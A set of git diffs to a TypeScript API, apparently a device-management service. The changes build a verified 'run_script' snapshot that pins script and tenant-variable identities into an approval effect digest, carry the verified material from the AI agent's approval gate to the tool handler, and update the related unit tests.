   // overwhelming majority of scripts that reference nothing.
   const needsScope = scriptNeedsVariableScope({ content, parameters: script.parameters });
-  const variableScope = await deps.loadScope(needsScope ? deviceOrgIds : []);
+  const variableScope = await deps.loadScope(needsScope ? deviceOrgIds : [], database);
 
   // `keys` non-empty implies `needsScope` (a key comes either from a content
   // token or from a parsed `tenantVariable` binding, and each of those is one

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -130,9 +130,9 @@ export type BuildRunScriptSnapshotResult =
  * entry points: `computeEffectDigestOutcome` from intentService.ts and
  * `computeEffectDigestForRelease` from jobs/intentReleaseWorker.ts and
  * services/aiAgentSdk.ts), so reusing that connection is what avoids
- * acquiring a second pooled one while the caller's transaction is still held. Injecting `loadScope` is what lets
- * the unit suite build snapshots without a live or mocked database module at
- * all. Production callers pass nothing.
+ * acquiring a second pooled one while the caller's transaction is still held.
+ * Injecting `loadScope` is what lets the unit suite build snapshots without a
+ * live or mocked database module at all. Production callers pass nothing.
  */
 export interface RunScriptSnapshotDeps {
   loadScope: (orgIds: string[], database: Database) => Promise<TenantVariableScope>;

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -1,0 +1,313 @@
+import { and, eq, inArray, isNull } from 'drizzle-orm';
+import {
+  canonicalizeScriptParameterDefinitions,
+  findVariableTokens,
+  scriptParameterDefinitionSchema,
+} from '@breeze/shared';
+import type { Database } from '../../db';
+import { devices, scripts } from '../../db/schema';
+import { scriptNeedsVariableScope } from '../sourcedParameters';
+import {
+  loadTenantVariableScope,
+  resolveForOrg,
+  unreadableForOrg,
+  type TenantVariableScope,
+} from '../tenantVariableResolution';
+
+/**
+ * The verified `run_script` snapshot (#3409 PR4c-1) — everything an approval
+ * pins about a script run, gathered once so the effect digest
+ * (`effectDigest.ts`, wired in Task 3) and dispatch can be built from the SAME
+ * observation.
+ *
+ * WHY THIS EXISTS. `effect_digest` used to pin five script fields (orgId,
+ * language, content, timeoutSeconds, runAs) and nothing else. Since #3409 PR3,
+ * that is no longer the set of things that determines what executes:
+ *
+ *   - `scripts.parameters` drives `scriptNeedsVariableScope` and every
+ *     per-parameter `tenantVariable` binding at `scriptDispatch.ts`, so
+ *     rebinding a parameter to a different variable changes what the device
+ *     runs with a byte-identical script body.
+ *   - The tenant variables themselves are late-bound per device org. An
+ *     approved run could have its variable rotated (new `version`), swapped
+ *     (an org override shadowing a partner-wide row: same key, same value,
+ *     different `variableId`), reclassified (`isSecret` flipped either way) or
+ *     deleted inside the approval window, all invisibly.
+ *
+ * So the snapshot pins a REFERENCE to each variable the run will consult —
+ * `variableId` + `version` + `isSecret` + `ownerScope`, per (org, key).
+ *
+ * THE INVARIANT: a resolved variable's VALUE never enters this module's
+ * digest material. `action_intents.effect_digest` is a widely-readable column
+ * and its input must not be reconstructible into tenant plaintext; identity is
+ * sufficient to detect drift, so identity is all that is pinned. The snapshot
+ * object itself carries the loaded `variableScope` (values included) for
+ * dispatch to reuse in-process — `runScriptDigestMaterial` deliberately does
+ * not read it.
+ */
+
+/**
+ * Whether the referenced variable resolved, existed-but-could-not-be-read, or
+ * was not defined at all for that org.
+ *
+ * `unreadable` is a state in its own right, not a flavour of `absent`: a row
+ * whose decrypt fails (rotated/By-missing key material) is an operational
+ * condition an approver's decision should not survive, and collapsing it into
+ * `absent` would make "the variable was deleted" and "the variable can no
+ * longer be read" produce the same digest.
+ */
+export type VariableReferenceState = 'present' | 'absent' | 'unreadable';
+
+/** One (org, key) reference — identity only, NEVER the value. */
+export type PinnedVariableReference = {
+  orgId: string;
+  key: string;
+  state: VariableReferenceState;
+  /** The four identity fields below are present only when `state === 'present'`. */
+  variableId?: string;
+  version?: number;
+  isSecret?: boolean;
+  ownerScope?: 'organization' | 'partner';
+};
+
+export type RunScriptSnapshot = {
+  script: {
+    id: string;
+    orgId: string | null;
+    language: string;
+    content: string;
+    timeoutSeconds: number;
+    runAs: string;
+  };
+  /**
+   * `scripts.parameters` canonicalized through the shared serializer (narrowed
+   * from the plan's `unknown` — it is always a string).
+   */
+  parameterDefinitions: string;
+  /** Unique org ids behind `args.deviceIds`, code-point sorted. */
+  deviceOrgIds: string[];
+  /** Code-point sorted by (orgId, key). */
+  variableReferences: PinnedVariableReference[];
+  /** The SAME scope dispatch will resolve against — carried, never digested. */
+  variableScope: TenantVariableScope;
+};
+
+export type BuildRunScriptSnapshotResult =
+  | { kind: 'snapshot'; snapshot: RunScriptSnapshot }
+  | { kind: 'missing_arg' }
+  | { kind: 'target_absent' };
+
+/**
+ * Test seam, mirroring why `effectDigest.ts` takes `database` rather than
+ * importing it: `loadTenantVariableScope` reads the module-level `db`
+ * singleton, so injecting it is what lets the unit suite build snapshots
+ * without a live or mocked database module. Production callers pass nothing.
+ */
+export interface RunScriptSnapshotDeps {
+  loadScope: (orgIds: string[]) => Promise<TenantVariableScope>;
+}
+
+const DEFAULT_DEPS: RunScriptSnapshotDeps = { loadScope: loadTenantVariableScope };
+
+/**
+ * UTF-16 code point order, NEVER `localeCompare`.
+ *
+ * The material this ordering feeds is hashed and compared across processes
+ * (creation in the API request, recomputation in the release worker), and
+ * `localeCompare` is a function of the runtime's ICU build and default locale
+ * — two workers with different ICU data would disagree about the order of
+ * `a_b` vs `a1b` (they genuinely do: locale collation puts `a_b` first, code
+ * point puts `a1b` first) and manufacture a spurious `content_changed`. Code
+ * point order is total, locale-independent and stable by definition.
+ */
+function byCodePoint(a: string, b: string): number {
+  return a < b ? -1 : a > b ? 1 : 0;
+}
+
+/**
+ * Every tenant-variable key this run will consult: the union of the content's
+ * `{{var.*}}` tokens and every `tenantVariable`-bound parameter's
+ * `variableKey`.
+ *
+ * Definitions are parsed ELEMENT BY ELEMENT with the shared schema, matching
+ * `sourcedParameters.ts`'s `parseDefinitions` — a live database holds lists
+ * written before PR3 validated them, and whole-list parsing would let one
+ * malformed sibling drop every real binding out of the reference set. A
+ * malformed BOUND element contributes no reference (dispatch fails that device
+ * outright), but it is still pinned through `parameterDefinitions`, which
+ * serializes the raw list when it does not parse as a whole.
+ */
+function referencedVariableKeys(content: string, parameters: unknown): string[] {
+  const keys = new Set(findVariableTokens(content));
+  if (Array.isArray(parameters)) {
+    for (const element of parameters) {
+      const parsed = scriptParameterDefinitionSchema.safeParse(element);
+      if (parsed.success && parsed.data.source === 'tenantVariable') keys.add(parsed.data.variableKey);
+    }
+  }
+  return [...keys].sort(byCodePoint);
+}
+
+/** `deviceIds` exactly as the tool schema declares it: a non-empty array of strings. */
+function readDeviceIds(value: unknown): string[] | null {
+  if (!Array.isArray(value) || value.length === 0) return null;
+  if (!value.every((id): id is string => typeof id === 'string')) return null;
+  return [...new Set(value)];
+}
+
+/**
+ * Gather everything the approval pins about one `run_script` call.
+ *
+ * `missing_arg` / `target_absent` carry the same meaning they do in
+ * `effectDigest.ts`: a malformed argument versus a resolver that ran and found
+ * no target. Both leave the intent unpinned-but-audited; neither is a
+ * validation of the caller's authorization, which the tool handler still owns.
+ */
+export async function buildRunScriptSnapshot(
+  args: Record<string, unknown>,
+  database: Database,
+  deps: RunScriptSnapshotDeps = DEFAULT_DEPS,
+): Promise<BuildRunScriptSnapshotResult> {
+  const scriptId = typeof args.scriptId === 'string' ? args.scriptId : null;
+  if (!scriptId) return { kind: 'missing_arg' };
+
+  // JUDGEMENT CALL. `deviceIds` is `required` in run_script's tool schema
+  // (`aiToolsScripts.ts`), so absent / empty / non-string-bearing all mean the
+  // call is MALFORMED rather than pointing at a target that vanished —
+  // `missing_arg`, the same bucket a missing `scriptId` lands in. The
+  // alternative (snapshot with an empty device set) would pin an empty
+  // reference list for a call that can never execute, which reads as "nothing
+  // referenced" instead of "this was never a well-formed run".
+  const deviceIds = readDeviceIds(args.deviceIds);
+  if (!deviceIds) return { kind: 'missing_arg' };
+
+  const [script] = await database
+    .select({
+      id: scripts.id,
+      orgId: scripts.orgId,
+      language: scripts.language,
+      content: scripts.content,
+      timeoutSeconds: scripts.timeoutSeconds,
+      runAs: scripts.runAs,
+      parameters: scripts.parameters,
+    })
+    .from(scripts)
+    // Same filter as the tool handler and the pre-PR4c resolver: a script
+    // soft-deleted after approval is `target_absent`, so the release fails
+    // closed rather than running a deleted script.
+    .where(and(eq(scripts.id, scriptId), isNull(scripts.deletedAt)))
+    .limit(1);
+  if (!script) return { kind: 'target_absent' };
+
+  const deviceRows: Array<{ id: string; orgId: string }> = await database
+    .select({ id: devices.id, orgId: devices.orgId })
+    .from(devices)
+    .where(inArray(devices.id, deviceIds));
+
+  // Fail closed on an unresolvable device rather than skipping it. Dropping it
+  // would shrink `deviceOrgIds`, which shrinks the reference set, which can
+  // make a digest MATCH while the fan-out the approver signed off on no longer
+  // exists.
+  if (deviceRows.length !== deviceIds.length) return { kind: 'target_absent' };
+
+  const deviceOrgIds = [...new Set(deviceRows.map((row) => row.orgId))].sort(byCodePoint);
+  const content = script.content;
+  const keys = referencedVariableKeys(content, script.parameters);
+
+  // Same gate dispatch uses, so the snapshot's scope is exactly the scope
+  // dispatch would have loaded — including the empty, query-free scope for the
+  // overwhelming majority of scripts that reference nothing.
+  const needsScope = scriptNeedsVariableScope({ content, parameters: script.parameters });
+  const variableScope = await deps.loadScope(needsScope ? deviceOrgIds : []);
+
+  // `keys` non-empty implies `needsScope` (a key comes either from a content
+  // token or from a parsed `tenantVariable` binding, and each of those is one
+  // of the gate's two disjuncts), so every org below is in the scope and
+  // `resolveForOrg`'s membership check cannot throw here.
+  const variableReferences: PinnedVariableReference[] = [];
+  for (const orgId of keys.length === 0 ? [] : deviceOrgIds) {
+    const resolved = resolveForOrg(variableScope, orgId);
+    const unreadable = unreadableForOrg(variableScope, orgId);
+    for (const key of keys) {
+      const variable = resolved.get(key);
+      if (variable) {
+        variableReferences.push({
+          orgId,
+          key,
+          state: 'present',
+          variableId: variable.variableId,
+          version: variable.version,
+          isSecret: variable.isSecret,
+          ownerScope: variable.ownerScope,
+        });
+        continue;
+      }
+      variableReferences.push({ orgId, key, state: unreadable.has(key) ? 'unreadable' : 'absent' });
+    }
+  }
+  // Already emitted in (orgId, key) order by the loops above; sorted anyway so
+  // the ordering is a stated property of the snapshot rather than a side
+  // effect of iteration order that a later refactor could silently drop.
+  variableReferences.sort((a, b) => byCodePoint(a.orgId, b.orgId) || byCodePoint(a.key, b.key));
+
+  return {
+    kind: 'snapshot',
+    snapshot: {
+      script: {
+        id: script.id,
+        orgId: script.orgId ?? null,
+        language: script.language,
+        content,
+        timeoutSeconds: script.timeoutSeconds,
+        runAs: script.runAs,
+      },
+      // An unparseable list still has to be pinned — two different corrupt
+      // lists must not hash the same — so fall back to the raw value. It is a
+      // jsonb column, so Postgres already normalized its key order and the
+      // fallback is stable across reads of the same stored value.
+      parameterDefinitions:
+        canonicalizeScriptParameterDefinitions(script.parameters) ??
+        `unparseable:${JSON.stringify(script.parameters ?? null)}`,
+      deviceOrgIds,
+      variableReferences,
+      variableScope,
+    },
+  };
+}
+
+/**
+ * The string hashed into `action_intents.effect_digest`.
+ *
+ * Determinism is by construction, not by luck: fixed object-literal field
+ * order (the same technique the rest of `effectDigest.ts` uses), explicitly
+ * code-point-sorted arrays, and a canonical parameter serialization from
+ * `@breeze/shared`. Nothing here reads `snapshot.variableScope`.
+ *
+ * `v: 2` is load-bearing. The v1 material was a bare five-field object; the
+ * envelope guarantees a v1 string can never accidentally equal a v2 one, so a
+ * digest pinned before this change fails closed (`content_changed`) on release
+ * instead of silently comparing equal against a narrower pin.
+ */
+export function runScriptDigestMaterial(snapshot: RunScriptSnapshot): string {
+  return JSON.stringify({
+    v: 2,
+    script: {
+      orgId: snapshot.script.orgId,
+      language: snapshot.script.language,
+      content: snapshot.script.content,
+      timeoutSeconds: snapshot.script.timeoutSeconds,
+      runAs: snapshot.script.runAs,
+    },
+    parameterDefinitions: snapshot.parameterDefinitions,
+    deviceOrgIds: snapshot.deviceOrgIds,
+    variableReferences: snapshot.variableReferences.map((reference) => ({
+      orgId: reference.orgId,
+      key: reference.key,
+      state: reference.state,
+      variableId: reference.variableId,
+      version: reference.version,
+      isSecret: reference.isSecret,
+      ownerScope: reference.ownerScope,
+    })),
+  });
+}

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -126,10 +126,11 @@ export type BuildRunScriptSnapshotResult =
  * importing it: production `loadScope` (below) forwards `buildRunScriptSnapshot`'s
  * own `database` argument straight into `loadTenantVariableScope`'s
  * `opts.database` (#3409 PR4c-1 Task 3b) — every call into this module
- * already runs inside a system-scoped transaction (see the three
- * `computeEffectDigestOutcome` call sites in effectDigest.ts's header), so
- * reusing that connection is what avoids acquiring a second pooled one while
- * the caller's transaction is still held. Injecting `loadScope` is what lets
+ * already runs inside a system-scoped transaction (the effect digest's three
+ * entry points: `computeEffectDigestOutcome` from intentService.ts and
+ * `computeEffectDigestForRelease` from jobs/intentReleaseWorker.ts and
+ * services/aiAgentSdk.ts), so reusing that connection is what avoids
+ * acquiring a second pooled one while the caller's transaction is still held. Injecting `loadScope` is what lets
  * the unit suite build snapshots without a live or mocked database module at
  * all. Production callers pass nothing.
  */

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -17,8 +17,8 @@ import {
 /**
  * The verified `run_script` snapshot (#3409 PR4c-1) — everything an approval
  * pins about a script run, gathered once so the effect digest
- * (`effectDigest.ts`, wired in Task 3) and dispatch can be built from the SAME
- * observation.
+ * (`effectDigest.ts`'s `run_script` resolver) and dispatch can be built from
+ * the SAME observation.
  *
  * WHY THIS EXISTS. `effect_digest` used to pin five script fields (orgId,
  * language, content, timeoutSeconds, runAs) and nothing else. Since #3409 PR3,
@@ -40,10 +40,18 @@ import {
  * THE INVARIANT: a resolved variable's VALUE never enters this module's
  * digest material. `action_intents.effect_digest` is a widely-readable column
  * and its input must not be reconstructible into tenant plaintext; identity is
- * sufficient to detect drift, so identity is all that is pinned. The snapshot
- * object itself carries the loaded `variableScope` (values included) for
- * dispatch to reuse in-process — `runScriptDigestMaterial` deliberately does
- * not read it.
+ * sufficient to detect drift, so identity is all that is pinned.
+ *
+ * WHY THE SCOPE IS A SIBLING, NOT A FIELD. The loaded `TenantVariableScope`
+ * holds decrypted PLAINTEXT, and dispatch wants to reuse the very scope the
+ * digest was pinned against rather than re-loading (and possibly re-resolving)
+ * it. Both are true, so it is returned ALONGSIDE the snapshot
+ * (`{ kind: 'snapshot', snapshot, scope }`) instead of hanging off it. Nesting
+ * it made `RunScriptSnapshot` a plaintext-bearing object one stray
+ * `JSON.stringify(snapshot)` in a log or audit path away from a leak, and made
+ * "the digest material never reads the scope" a matter of discipline. With the
+ * split, `RunScriptSnapshot` is pure digest material — the leak is not guarded
+ * against, it is structurally absent.
  */
 
 /**
@@ -88,12 +96,16 @@ export type RunScriptSnapshot = {
   deviceOrgIds: string[];
   /** Code-point sorted by (orgId, key). */
   variableReferences: PinnedVariableReference[];
-  /** The SAME scope dispatch will resolve against — carried, never digested. */
-  variableScope: TenantVariableScope;
 };
 
 export type BuildRunScriptSnapshotResult =
-  | { kind: 'snapshot'; snapshot: RunScriptSnapshot }
+  | {
+      kind: 'snapshot';
+      /** Digest material only — carries no variable VALUE (see the header). */
+      snapshot: RunScriptSnapshot;
+      /** The SAME scope dispatch will resolve against. Plaintext-bearing: never digested, never serialized. */
+      scope: TenantVariableScope;
+    }
   | { kind: 'missing_arg' }
   | { kind: 'target_absent' };
 
@@ -270,8 +282,8 @@ export async function buildRunScriptSnapshot(
         `unparseable:${JSON.stringify(script.parameters ?? null)}`,
       deviceOrgIds,
       variableReferences,
-      variableScope,
     },
+    scope: variableScope,
   };
 }
 
@@ -281,7 +293,8 @@ export async function buildRunScriptSnapshot(
  * Determinism is by construction, not by luck: fixed object-literal field
  * order (the same technique the rest of `effectDigest.ts` uses), explicitly
  * code-point-sorted arrays, and a canonical parameter serialization from
- * `@breeze/shared`. Nothing here reads `snapshot.variableScope`.
+ * `@breeze/shared`. The scope is not in reach of this function at all — it is
+ * a sibling of the snapshot, not a field on it (see the header).
  *
  * `v: 2` is load-bearing. The v1 material was a bare five-field object; the
  * envelope guarantees a v1 string can never accidentally equal a v2 one, so a

--- a/apps/api/src/services/aiAgentSdk.enforcementArmingGate.test.ts
+++ b/apps/api/src/services/aiAgentSdk.enforcementArmingGate.test.ts
@@ -164,9 +164,14 @@ vi.mock('./actionIntents/revalidateRelease', () => ({
     mockRevalidateApprovedIntentForRelease(...args),
 }));
 
-const mockComputeEffectDigest = vi.fn((..._args: unknown[]) => Promise.resolve<string | null>(null));
+const mockComputeEffectDigest = vi.fn((..._args: unknown[]) =>
+  Promise.resolve<{ digest: string | null; context?: unknown }>({ digest: null }),
+);
 vi.mock('./actionIntents/effectDigest', () => ({
-  computeEffectDigest: (...args: unknown[]) => mockComputeEffectDigest(...args),
+  // `computeEffectDigestForRelease` is the RELEASE-path compute (#3409
+  // PR4c-1) — it returns `{ digest, context? }` so the inline path can keep
+  // the material it already resolved instead of letting the handler re-read.
+  computeEffectDigestForRelease: (...args: unknown[]) => mockComputeEffectDigest(...args),
   hasPinnedDigest: (intent: { effectDigest?: string | null }) =>
     typeof intent?.effectDigest === 'string' && intent.effectDigest.length > 0,
 }));

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -2642,7 +2642,7 @@ describe('Task 2: plan index advances only once the step is authorized', () => {
   // pin one; unpinnable four_eyes intents skip it too) must skip the
   // recompute entirely and let the step execute normally — proves the check
   // is opt-in on a stored digest, not a blanket recompute-and-compare.
-  it('executes normally and never calls computeEffectDigest when the stored effect digest is null', async () => {
+  it('executes normally and never calls the digest recompute when the stored effect digest is null', async () => {
     vi.mocked(checkGuardrails).mockReturnValue({
       allowed: true,
       tier: 3,

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -151,9 +151,14 @@ vi.mock('./actionIntents/revalidateRelease', () => ({
 // without wiring a real resolver's DB reads through the ../db mock. Default:
 // resolves to null (no digest computed) — irrelevant to every pre-existing
 // test in this file, since none of them set a truthy intentRow.effectDigest.
-const mockComputeEffectDigest = vi.fn((..._args: unknown[]) => Promise.resolve<string | null>(null));
+const mockComputeEffectDigest = vi.fn((..._args: unknown[]) =>
+  Promise.resolve<{ digest: string | null; context?: unknown }>({ digest: null }),
+);
 vi.mock('./actionIntents/effectDigest', () => ({
-  computeEffectDigest: (...args: unknown[]) => mockComputeEffectDigest(...args),
+  // The RELEASE-path compute (#3409 PR4c-1) — returns `{ digest, context? }`
+  // so this path can compare the digest AND keep the material the recompute
+  // already resolved, instead of letting the handler read it a second time.
+  computeEffectDigestForRelease: (...args: unknown[]) => mockComputeEffectDigest(...args),
   // Faithful stand-in for the SHARED pinned-digest predicate both release
   // paths now use (jobs/intentReleaseWorker.ts and the inline path here);
   // its real semantics live in services/actionIntents/effectDigest.ts and
@@ -2605,7 +2610,7 @@ describe('Task 2: plan index advances only once the step is authorized', () => {
       ]),
     };
     vi.mocked(db.select).mockReturnValue(selectChain as any);
-    mockComputeEffectDigest.mockResolvedValueOnce('recomputed-digest-xyz');
+    mockComputeEffectDigest.mockResolvedValueOnce({ digest: 'recomputed-digest-xyz' });
     const session = makeActiveSession({
       approvalMode: 'action_plan',
       activePlanId: 'plan-1',
@@ -2675,6 +2680,9 @@ describe('Task 2: plan index advances only once the step is authorized', () => {
     expect(result).toEqual({ allowed: true, intentId: 'intent-plan-digest-null' });
     expect(session.currentPlanStepIndex).toBe(1);
     expect(mockComputeEffectDigest).not.toHaveBeenCalled();
+    // Nothing was verified, so nothing is handed to the handler — the
+    // no-context path must stay byte-identical for every unpinned tool call.
+    expect((result as { context?: unknown }).context).toBeUndefined();
     // No content_changed CAS — only the approved -> executing CAS ran.
     expect(mockTransitionIntent).not.toHaveBeenCalledWith(
       expect.anything(),
@@ -2682,6 +2690,62 @@ describe('Task 2: plan index advances only once the step is authorized', () => {
       'failed',
       expect.objectContaining({ errorCode: 'content_changed' }),
     );
+  });
+
+  // #3409 PR4c-1: the inline path verifies here (createSessionPreToolUse) but
+  // the tool runs later, from aiAgentSdkTools.ts's makeHandler. The two are
+  // coupled by this callback's RETURN VALUE (the same channel `intentId`
+  // already travels on), so the material the recompute resolved is carried
+  // across rather than re-read inside the handler.
+  it('carries the verified material from a MATCHING recompute back to the handler', async () => {
+    vi.mocked(checkGuardrails).mockReturnValue({
+      allowed: true,
+      tier: 3,
+      requiresApproval: true,
+      description: 'Execute command',
+    } as any);
+    mockInsertReturning({ id: 'exec-plan-digest-match' });
+    mockCreateActionIntent.mockResolvedValue(
+      makeIntentSnapshot({ id: 'intent-plan-digest-match', approvalRequestIds: ['appr-plan-digest-match'] }),
+    );
+    mockWaitForIntentDecision.mockResolvedValue('approved');
+    mockTransitionIntent.mockResolvedValue(true); // wins the release CAS
+    const selectChain: Record<string, unknown> = {
+      from: vi.fn(() => selectChain),
+      where: vi.fn(() => selectChain),
+      limit: vi.fn(async () => [
+        {
+          id: 'intent-plan-digest-match',
+          boundArgumentDigest: 'digest',
+          actionName: 'execute_command',
+          arguments: { command: 'whoami' },
+          effectDigest: 'stored-digest-abc',
+        },
+      ]),
+    };
+    vi.mocked(db.select).mockReturnValue(selectChain as any);
+    const verifiedRunScript = {
+      snapshot: { script: { id: 's-1' } },
+      scriptRow: { id: 's-1' },
+      scope: { orgIds: new Set(['org-1']) },
+    };
+    mockComputeEffectDigest.mockResolvedValueOnce({
+      digest: 'stored-digest-abc', // matches
+      context: { verifiedRunScript },
+    });
+    const session = makeActiveSession({
+      approvalMode: 'action_plan',
+      activePlanId: 'plan-1',
+      approvedPlanSteps: new Map([[0, { toolName: 'execute_command', input: { command: 'whoami' } }]]),
+    });
+
+    const result = await createSessionPreToolUse(session)('execute_command', { command: 'whoami' });
+
+    expect(result.allowed).toBe(true);
+    // Identity, not shape: the handler must get the very object the recompute
+    // resolved, so a re-read cannot masquerade as the verified one.
+    expect((result as { context?: { verifiedRunScript?: unknown } }).context?.verifiedRunScript)
+      .toBe(verifiedRunScript);
   });
 
   // Regression guards restored from PR #2853. Task 1 necessarily inverted the

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -30,7 +30,8 @@ import type { DelegantM365ConnectionRow } from '../db/schema/delegant';
 import { createActionIntent, waitForIntentDecision, transitionIntent } from './actionIntents/intentService';
 import { revalidateApprovedIntentForRelease } from './actionIntents/revalidateRelease';
 import { requiresDurableRelease } from './actionIntents/durableRelease';
-import { computeEffectDigest, hasPinnedDigest } from './actionIntents/effectDigest';
+import { computeEffectDigestForRelease, hasPinnedDigest } from './actionIntents/effectDigest';
+import type { ToolExecutionContext } from './toolExecutionContext';
 import {
   assertNoPlaintextSecret,
   isSecretBearingTool,
@@ -468,6 +469,15 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
     // carried on the terminal `return` so postToolUse can seal against the
     // right intent without relying solely on pendingIntentBySession.
     let createdIntentId: string | undefined;
+
+    // Material the inline RELEASE below resolved and verified against the
+    // intent's pinned effect digest (#3409 PR4c-1). It rides the same terminal
+    // `return` as `createdIntentId` — that return value is the ONLY channel
+    // between this callback and aiAgentSdkTools.ts's makeHandler, which is
+    // where the tool actually runs. Without it the handler re-reads the script
+    // row and re-resolves the tenant variables the digest just verified,
+    // reopening the check/use window the digest exists to close.
+    let verifiedToolContext: ToolExecutionContext | undefined;
 
     // Reject unknown tools (defense-in-depth — SDK whitelist should already filter)
     if (!TOOL_TIERS[toolName]) {
@@ -1192,12 +1202,12 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
           // every pinned release would have been content_changed). One
           // predicate, one behavior, in one place.
           if (hasPinnedDigest(intentRow)) {
-            const recomputedEffectDigest = await runOutsideDbContext(() =>
+            const recomputed = await runOutsideDbContext(() =>
               withSystemDbAccessContext(() =>
-                computeEffectDigest(intentRow.actionName, intentRow.arguments, db),
+                computeEffectDigestForRelease(intentRow.actionName, intentRow.arguments, db),
               ),
             );
-            if (recomputedEffectDigest !== intentRow.effectDigest) {
+            if (recomputed.digest !== intentRow.effectDigest) {
               await transitionIntent(intent.id, 'executing', 'failed', {
                 errorCode: 'content_changed',
               });
@@ -1209,6 +1219,11 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
                 error: 'The referenced content changed after approval; it was not executed.',
               });
             }
+            // Digest matched, so the material the recompute resolved IS what
+            // the approver approved — hand it to the handler rather than
+            // letting it read the same rows again. Only reached on a match:
+            // the mismatch branch above returns.
+            verifiedToolContext = recomputed.context;
           }
 
           // Won the release: track the intent id so createSessionPostToolUse can
@@ -1524,7 +1539,7 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
             : 'per_step_user',
       });
     }
-    return { allowed: true, intentId: createdIntentId };
+    return { allowed: true, intentId: createdIntentId, context: verifiedToolContext };
   };
 }
 

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -1170,9 +1170,15 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
           // approver approves a REFERENCE ("run script <id>"), and the referenced
           // content can drift during the approval window while the intent's own
           // arguments/argumentDigest stay byte-identical. `intentRow.effectDigest`
-          // is NULL for supervised intents (never pinned) and unpinnable four_eyes
-          // intents (no resolver, or target didn't exist yet at creation) — both
-          // skip this check by design, same as the worker. Wrapped in
+          // is NULL only when the tool/action had no resolver at creation
+          // (`not_applicable`) or a resolver existed but couldn't resolve the
+          // target (`unresolved`) — approval scope plays no part: pinning is
+          // scope-independent (changed 2026-08-06, see effectDigest.ts's
+          // header), so a SUPERVISED intent whose tool has a resolver
+          // (run_script is the flagship case) IS pinned and DOES run this
+          // check, same as a four_eyes intent. It used to be skipped for
+          // every supervised intent when pinning was gated on
+          // `approvalScope === 'four_eyes'`; that gate is gone. Wrapped in
           // withSystemDbAccessContext (via runOutsideDbContext, same discipline as
           // the intentRow/winningApproval read above) because the resolver needs
           // to read the current target row, which the ambient request context may

--- a/apps/api/src/services/aiAgentSdkTools.ts
+++ b/apps/api/src/services/aiAgentSdkTools.ts
@@ -14,6 +14,7 @@ import { db, withDbAccessContext, runOutsideDbContext } from '../db';
 import type { DbAccessContext } from '../db';
 import { eq } from 'drizzle-orm';
 import { executeTool, aiTools } from './aiTools';
+import type { ToolExecutionContext } from './toolExecutionContext';
 import type { AiToolTier, ActionPlanStep } from '@breeze/shared/types/ai';
 import { compactToolResultForChat } from './aiToolOutput';
 import { sanitizeThrownToolError } from './aiToolErrors';
@@ -72,11 +73,22 @@ const SECRET_ACTION_REFUSED_TEXT =
  * intent row it can seal a secret into. Secret-bearing tools use its absence
  * to fail closed (see makeSessionAwareHandler) rather than mint a credential
  * with nowhere safe to store it.
+ *
+ * `context` (#3409 PR4c-1) is the same idea one step further: the inline chat
+ * RELEASE path verifies an approved intent's pinned effect digest inside this
+ * callback (aiAgentSdk.ts's createSessionPreToolUse), but the tool itself runs
+ * later, from makeHandler below. This return value is the only channel between
+ * the two, so the material the verification already resolved rides it across
+ * and the handler executes from it instead of reading the same rows again.
+ * Absent for every other caller, and the handler must behave identically then.
  */
 export type PreToolUseCallback = (
   toolName: string,
   input: Record<string, unknown>,
-) => Promise<{ allowed: true; intentId?: string } | { allowed: false; error: string }>;
+) => Promise<
+  | { allowed: true; intentId?: string; context?: ToolExecutionContext }
+  | { allowed: false; error: string }
+>;
 
 /**
  * Callback invoked after each tool execution (success or failure).
@@ -360,9 +372,18 @@ function makeHandler(
     return runOutsideDbContext(async (): Promise<SdkToolResult> => {
     const startTime = Date.now();
 
+    // Material the preToolUse gate already verified against an approved
+    // intent's pinned effect digest (#3409 PR4c-1). Declared out here because
+    // the check happens in this block and the tool runs further down; stays
+    // `undefined` for every caller that verified nothing, which is what keeps
+    // the executeTool call three arguments wide.
+    let verifiedContext: ToolExecutionContext | undefined;
+
     // Pre-execution check (guardrails, RBAC, rate limits, approval)
     if (onPreToolUse) {
-      let check: { allowed: true } | { allowed: false; error: string };
+      let check:
+        | { allowed: true; context?: ToolExecutionContext }
+        | { allowed: false; error: string };
       try {
         check = await onPreToolUse(toolName, args);
       } catch (err) {
@@ -372,6 +393,7 @@ function makeHandler(
         const reason = sanitizeThrownToolError(`${toolName}:preToolUse`, err);
         check = { allowed: false, error: `Guardrails check failed: ${reason}` };
       }
+      if (check.allowed) verifiedContext = check.context;
       if (!check.allowed) {
         const safeError = compactToolResultForChat(toolName, JSON.stringify({ error: check.error }));
         await safePostToolUse(onPostToolUse, toolName, args, safeError, true, 0);
@@ -401,7 +423,14 @@ function makeHandler(
       // identical to the one authMiddleware opened — not wider.
       const dbContext: DbAccessContext = dbAccessContextFromAuth(auth);
       const result = await withToolTimeout(
-        withDbAccessContext(dbContext, () => executeTool(toolName, args, auth)),
+        withDbAccessContext(dbContext, () =>
+          // Three arguments unless something was actually verified — an
+          // options bag carrying `context: undefined` would be a behaviour
+          // change for every ordinary chat tool call.
+          verifiedContext
+            ? executeTool(toolName, args, auth, { context: verifiedContext })
+            : executeTool(toolName, args, auth),
+        ),
         toolTimeout,
         toolName,
       );
@@ -663,8 +692,9 @@ function makeSessionAwareHandler(
   };
 }
 
-// Exported for unit tests that lock in the enforcement ordering.
-export const __test__ = { makeSessionAwareHandler };
+// Exported for unit tests that lock in the enforcement ordering, and (for
